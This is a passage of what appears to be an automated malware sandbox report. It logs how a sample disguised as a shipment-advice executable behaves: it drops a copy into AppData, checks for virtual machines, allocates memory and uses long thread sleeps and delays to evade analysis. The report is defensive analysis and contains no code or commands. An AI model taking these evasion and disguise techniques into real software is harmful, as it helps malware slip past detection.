                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 7EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 8EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 9070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: A070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: 49A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 18B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 3360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 18B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 7980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 8B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 9B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 1480000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMemory allocated: 15D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599436Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599108Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598452Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598010Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595058Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594613Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596341
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595865
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595297
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595078
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594969
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594739
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594391
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594050
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7118Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 800Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7915Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1124Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeWindow / User API: threadDelayed 6904Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeWindow / User API: threadDelayed 2954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeWindow / User API: threadDelayed 8054
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeWindow / User API: threadDelayed 1793
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 7118 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 800 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7672Thread sleep count: 6904 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7672Thread sleep count: 2954 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599436s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599108s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598780s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598452s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -598010s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596703s >= -30000sJump to behavior
